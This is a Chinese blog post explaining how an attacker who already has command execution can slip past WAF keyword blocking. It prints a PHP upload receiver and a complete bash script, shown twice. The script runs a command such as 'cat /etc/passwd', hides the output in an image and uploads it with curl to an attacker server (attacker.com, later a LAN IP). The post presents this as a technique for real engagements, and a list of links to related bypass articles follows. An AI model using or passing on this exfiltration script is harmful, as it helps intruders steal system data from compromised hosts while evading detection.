执行_命令执行之绕过防火墙继续执行命令

最新推荐文章于 2024-04-14 12:08:15 发布
最新推荐文章于 2024-04-14 12:08:15 发布
阅读量264 收藏
点赞数
文章标签: 执行
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34626306/article/details/112266582
版权

  各位师傅已放假,公众号更新速度自然也要跟得上。今天就是一个命令执行的小技巧。

我们在实战中经常会遇到命令执行漏洞,而由于现在各类waf横行,就会导致我们在执行一些命令时直接被waf拦截,比如执行cat /etc/passwd的时候,直接被拦截了关键字,导致我们无法成功执行。类似于下图这种。

7b846057fe1d5195fb971eba35edc068.png

然后直接被waf拦截住。这个时候如果目标出网的话,我们就可以使用下面的方法,进行突破。原理大体如下:

35afbeb42905aef8d6a8dd48bc66b901.png

即让目标主动访问我们的一个php的服务,并且将执行结果写入图片,然后打开图片得到我们的命令执行结果

下面是具体操作:

首先我们需要准备一个php文件,内容如下:

<?php     $file = date("dHis") . ".png";    move_uploaded_file($_FILES['image']['tmp_name'], $file);?>

然后我们还需要一个脚本文件,来完成请求与命令执行操作:

#!/bin/bash# Script for https://null-byte.com/smuggle-data-through-firewalls-0197128/# `if` statement to detemine if the message is a 'response' one# This is the command being executed and embedded in the photo.# Single-quotes are used here to help with escaping special# characters within the desired command(s).exfilData='ls -lah "/Users/$USER/"'# Where the attackers PHP server is located. This needs to be# updated to use a public domain, like Dropbox or something# with an official API.exfilSite="http://attacker.com/index.php"# If no suitable image is found on the target computer, this# image will be downloaded and used instead. By default, the# script tries to use an image already on the MacBook to# minimize the amount of traffic originating the device.tmpImage="https://support.apple.com/content/dam/edam/applecare/images/en_US/repair/psp-repair_2x.png"# The `find` command used to locate a suitable image to embed# data into. It will check the users home (~) directory for the# first (-print -quit) JPG, JPEG, or PNG smaller than 100k.# The filesize maximum and filetypes are somewhat arbitrary.# The size can be increased and the filetypes can be expanded# to use MP3, PDF, and MOV files, for example.findImage="$(find ~ -type f -size -100k \( -iname '*.jp*g' -o -iname '*.png' \) -print -quit)"# If the encryption option is enabled, the password is hardcoded# into the payload for convenience, making it possible to# reverse engineer and decrypt the exfiltrated data inside the# image. This is a quick and dirty solution.pass="password123"# An `if` statement to detect if a suitable PNG or JPG was# discovered. If not, it will download the backup image# defined earlier in the script (tmpImage).if [[ ! -f "$findImage" ]]; then  # Curl will silently (-s) download the backup image and  # save it (-o) into the /tmp directory with the i.jpg filename.  curl -s "$tmpImage" -o "/tmp/i.jpg"  # The backup image is set into the exfilImage variable for  # later commands.  exfilImage="/tmp/i.jpg"else  # If a suitable image is discovered, the exfilImage variable  # is set for later commands.  exfilImage="$findImage"fi# It may or may not be desirable to encrypt the payload output# before embedding it into the image. Set to `1` to enable# encryption, set to `0` to disable it.useEncrypt='1'# An `if` statement to determine the value of the exfilType# variable. If `1` it will encrypt with openssl (LibreSSL).# Otherwise, it will not encrypt.if [[ "$useEncrypt" = '1' ]]; then  # OpenSSL is used to encrypt (enc) the payload output  # as well as encode (-a -A) the encrypted data with a  # password (-pass).  exfilData="$(openssl enc -aes-256-cbc -a -A -in  -pass pass:$pass)"else  # If encryption isn't used, Bash will evaluable the variable  # and execute it as a command.  exfilData="$(eval $exfilData)"fi# Printf is used to embed the command output directly into# image. It will append (>>) the data on a newline (\n\n).# The newlines make it easy to quickly extract the data# after it has been delivered to the attacker.printf '\n\n%s' "$exfilData" >> "$exfilImage"# Curl will exfiltrate the image to the attackers PHP# server.curl -F "image=@$exfilImage" "$exfilSite"

然后我们修改exfilData为我们需要执行的命令,exfilSite为你的php站点的地址,tmpImage是图片的一个地址,我这里直接使用百度的图片,useEncrypt决定是否进行硬编码,1为使用上面的密码进行编码,0为不编码。

修改后如下:

#!/bin/bash# Script for https://null-byte.com/smuggle-data-through-firewalls-0197128/# `if` statement to detemine if the message is a 'response' one# This is the command being executed and embedded in the photo.# Single-quotes are used here to help with escaping special# characters within the desired command(s).exfilData='cat /etc/passwd'# Where the attackers PHP server is located. This needs to be# updated to use a public domain, like Dropbox or something# with an official API.exfilSite="http://192.168.0.107/index.php"# If no suitable image is found on the target computer, this# image will be downloaded and used instead. By default, the# script tries to use an image already on the MacBook to# minimize the amount of traffic originating the device.tmpImage="https://www.baidu.com/img/PCtm_d9c8750bed0b3c7d089fa7d55720d6cf.png"# The `find` command used to locate a suitable image to embed# data into. It will check the users home (~) directory for the# first (-print -quit) JPG, JPEG, or PNG smaller than 100k.# The filesize maximum and filetypes are somewhat arbitrary.# The size can be increased and the filetypes can be expanded# to use MP3, PDF, and MOV files, for example.findImage="$(find ~ -type f -size -100k \( -iname '*.jp*g' -o -iname '*.png' \) -print -quit)"# If the encryption option is enabled, the password is hardcoded# into the payload for convenience, making it possible to# reverse engineer and decrypt the exfiltrated data inside the# image. This is a quick and dirty solution.pass="password123"# An `if` statement to detect if a suitable PNG or JPG was# discovered. If not, it will download the backup image# defined earlier in the script (tmpImage).if [[ ! -f "$findImage" ]]; then  # Curl will silently (-s) download the backup image and  # save it (-o) into the /tmp directory with the i.jpg filename.  curl -s "$tmpImage" -o "/tmp/i.jpg"  # The backup image is set into the exfilImage variable for  # later commands.  exfilImage="/tmp/i.jpg"else  # If a suitable image is discovered, the exfilImage variable  # is set for later commands.  exfilImage="$findImage"fi# It may or may not be desirable to encrypt the payload output# before embedding it into the image. Set to `1` to enable# encryption, set to `0` to disable it.useEncrypt='0'# An `if` statement to determine the value of the exfilType# variable. If `1` it will encrypt with openssl (LibreSSL).# Otherwise, it will not encrypt.if [[ "$useEncrypt" = '1' ]]; then  # OpenSSL is used to encrypt (enc) the payload output  # as well as encode (-a -A) the encrypted data with a  # password (-pass).  exfilData="$(openssl enc -aes-256-cbc -a -A -in  -pass pass:$pass)"else  # If encryption isn't used, Bash will evaluable the variable  # and execute it as a command.  exfilData="$(eval $exfilData)"fi# Printf is used to embed the command output directly into# image. It will append (>>) the data on a newline (\n\n).# The newlines make it easy to quickly extract the data# after it has been delivered to the attacker.printf '\n\n%s' "$exfilData" >> "$exfilImage"# Curl will exfiltrate the image to the attackers PHP# server.curl -F "image=@$exfilImage" "$exfilSite"

然后开启一个web服务:

bcf7237a041254b50fc537a273264feb.png

然后模拟攻击者执行脚本文件,服务器得到请求

c24952f91833d46aac96ea4caed54d5e.png

服务器生成图片,打开图片得到命令执行的内容:

6b8af2f985174eb84fd35b6936e09812.png

参考文章:

https://null-byte.wonderhowto.com/how-to/hacking-macos-use-images-smuggle-data-through-firewalls-0197128/

giants_planet
关注
RCE远程命令/代码执行漏洞及绕过
G3et的博客
01-01 856
(1)RCE主要是执行了危险的函数(3)常见的绕过:空格过滤、命令分隔符、编码绕过、Hex编码绕过、Oct编码绕过、变量绕过、反斜杠绕过、偶读拼接绕过关键字过滤等 (4)熟悉掌握php中远程命令/代码执行的相关函数以及绕过和原理参考文档:远程命令/代码执行漏洞(RCE)总结RCE远程命令执行绕过初学RCE(远程命令/代码执行漏洞)
关闭linux终端还让程序继续执行的方法
u012253351的博客
06-26 1307
关闭linux终端还让程序继续执行的方法 1 2 3 从上面的输出可以看出,我们运行的test.sh的父进程变成了【PID 1】,由linux主进程接管。nohup是忽略SIGHUP信号,那有没有其他的思路?使用setsid命令可以使程序打开新的进程,该进程继承了父进程组的ID。从下图可以看到,test.sh脚本的父进程已经是in...
BugBounty—我如何能够绕过防火墙进行RCE并获取root用户权限
woliuqiangdong的博客
02-03 450
  前言   嗨,大家好,   此篇文章是关于Apache struts2 CVE-2013-2251的病毒式传播并由于其能导致执行远程命令而被高度利用的漏洞。   简而言之,通过操纵以"action:"/"redirect:"/"redirectAction:"为前缀的参数引入的漏洞,可以使用小于Struts 2.3.15作为框架,在Java Web应用程序中执行远程命令。   现在,当这个漏洞发生传播时,主流应用防火墙公司开始更新他们的规则引擎和检测技术,以防止它的进一步感染,这是一个非...
盘点攻击者常用的八种防火墙绕过方法
jennycisp的博客
10-28 2554
防火墙是网络安全体系中的重要组成部分,通过过滤网络流量和监控网络连接来提供一定程度的安全保护,并帮助组织识别和拦截恶意流量以及阻止未经授权的访问。目前情况表明,防火墙并非“万能”解决方案,也不能提供绝对的安全保障,需要与其它防御技术手段组合在一起,才能构建起有效的网络安全防御体系。防火墙只能根据预设的规则进行过滤和检测,简单的规则配置可能无法完全捕获复杂的攻击方式,网络攻击技术通过不断创新和演进,可能利用未知的漏洞或隐蔽的攻击方式来规避防火墙的保护。
第19篇:WEB漏洞~SQL注入~SqlMap绕过WAF
廖一语山的博客
08-06 2056
Sqlmap
CTF命令执行绕过技巧
热门推荐
JBlock的博客
03-07 2万+
前言 今天是代码审计部分的一个技巧补充!前些阵子做了sql注入回顾篇系列!今天开启php代码审计系列! 今天内容主要是CTF中命令注入及绕过的一些技巧!以及构成RCE的一些情景! 文章目录前言正文代码执行代码执行的几种方式命令执行常见命令执行函数绕过姿势敏感字符绕过处理无回显的命令执行Think one Think 正文 在详细介绍命令注入之前,有一点需要注意:命令注入与远程代码执行不同。他们的区...
struts2绕过waf读写文件及另类方式执行命令1
08-03
首先,我们注意到标题提到的"struts2绕过waf读写文件及另类方式执行命令1",这表明我们将讨论Struts2框架中的一种或多种漏洞,这些漏洞可能导致攻击者能够绕过WAF的保护措施,执行命令或进行文件操作。 在描述中,...
Nmap绕过防火墙
HoYim
04-24 7280
1.碎片化 Nmap发送8个字节的数据包绕过防火墙/IDS/IPS。在防火墙配置不当的时候有用。 nmap -f host MTU,最大传输单元,它是碎片化的别名,我们可以指定它的大小(8的倍数)。 nmap --mtu 16 host 2.诱饵 这种类型的扫描是非常隐蔽且无法察觉。目标由多个假冒或伪造IP地址进行扫描。这样防火墙就会认为攻击或扫描是通过多个资源或IP地址进行,于是就绕...
struts2绕过waf读写文件及另类方式执行命令.doc
07-08
本篇文章主要探讨了如何在WAF(Web应用防火墙)的防护下,通过Struts2绕过关键词限制来实现文件读写和命令执行。 首先,WAF通常会过滤一些敏感关键词,如`Runtime`和`dispatcher`,以防止恶意用户利用它们执行命令...
技术分享 某下一代防火墙远程命令执行漏洞分析及防护绕过_深信服下一代防火墙ngaf login远程命令执行漏洞
最新发布
2401_83621634的博客
04-14 878
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
利用 DNS 隧道传递数据和命令绕过防火墙
不急不躁
08-07 2万+
不论你对出站流量采取多么严格的访问控制,你可能都要允许至少对一个服务器的 DNS 请求。对手就可以利用这个防火墙上的“大洞”来偷运数据,并且建立一个非常难以限制的隐蔽命令控制信道。为了学习 DNS 作为命令控制信道的使用方法,我们今天来介绍一个由 Ron Bowes 开发的工具 dnscat2,有了这个工具我们就能轻而易举的实现这种攻击技术。 隧道的部署实施需要一个由攻击者控制的主机来运行 dns
如何绕过 Web 应用程序防火墙(WAF)?
大方子
09-23 4101
在 Web 应用程序中发现远程命令执行漏洞并不罕见,「OWASP Top 10 2017」榜单中,把“注入”放在第一位,就可见一斑:   当攻击者把作为命令或查询的不可信数据发送给解释器时,会产生注入漏洞,如 SQL,NoSQL,OS 和 LDAP 注入。攻击者的数据可能会诱使解释器执行意外的命令或在没有授权的情况下访问数据。   所有现代 Web 应用防火墙都能拦截 RCE 尝试,但...
如何绕过 Web 应用程序防火墙(WAF)之通配符
qq_37432174的博客
03-17 1983
在 Web 应用程序中发现远程命令执行漏洞并不罕见,「OWASP Top 10 2017」榜单中,把“注入”放在第一位,就可见一斑: 当攻击者把作为命令或查询的不可信数据发送给解释器时,会产生注入漏洞,如 SQL,NoSQL,OS 和 LDAP 注入。攻击者的数据可能会诱使解释器执行意外的命令或在没有授权的情况下访问数据。 所有现代 Web 应用防火墙都能拦截 RCE 尝试,但是当它发生在 Lin...
任意文件上传之绕过云waf+本地防火墙双重防护
墨痕诉清风的博客
10-28 972
因为这种单位很喜欢将自己的服务器部署在C段的分散的IP上,于是猜测,这个类似官网网站的站点也很有可能就搭建在这个超链接的C段上,我们不妨 host 碰撞一下,如果找到了真实IP的话,那么就可能绕过云 waf。但是这里内容检测还是过不了,但是不会显示云 waf 地址或者 502了,猜测肯定是过了 cdn, 但是不知道是什么拦截住了(可能为本地的硬件防火墙)时,就可以过内容检测,不知道市面上有没有这种类型的webshell,我找了一圈好像都有。尝试了一下,发现content-Encoding居然可以绕过
防火墙(firewall)相关命令
mijichui2153的博客
08-08 7746
记录防火墙相关命令,方便以后使用
有关windowns远程桌面漏洞修复方法,从注册表修改端口,命令做ACL限制防火墙端口和远程IP地址
Hatch_j的博客
05-21 4771
1、打微软补丁 MS14-066 http://technet.microsoft.com/security/bulletin/MS14-066 2、修改远程默认端口3389, 一般远程桌面默认端口3389,一些平台扫描漏洞,此端口被认为了高危端口,下面为修改远程桌面端口方法 第一步,关闭Windows防火墙 控制面板关闭,不赘述 PS:为了防止修改过程中出错,...
[投稿]Webshell下命令执行限制及绕过方法
Coisini的博客
06-23 4112
0x00 前言 上传webshell后,执行命令时或许没法执行了,这时我们该分析下原理并想出绕过方式,防守方也必须根据绕过方式想想更强的防御. 0x01 php webshell执行命令原理 php webshell(以下简称webshell)下是怎么执行系统命令的?我们找一个webshell分析下 搜索关键字定位到以下代码 function execute($cfe) { $re...
WAF如何应对payload编码绕过
focus on security
06-07 1654
web服务器在对外提供各种应用服务时,经常会遇到请求的payload经过混淆或者编码想要绕过web安全防火墙。 如果在http请求中添加编码很可能会绕过waf规则,甚至绕过语义分析。导致数据泄漏风险,本应该被拦截的请求,还是得到了请求对应的响应数据。 可以通过下面连接了解一下,想要绕过web安全防火墙经过处理的payload长什么样。这里是我参考owasp(感谢他们对web安全做出的贡献)整理的xss攻击方式,包含各种经过处理的payload绕过方法。 https://blog.csdn.net/re
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值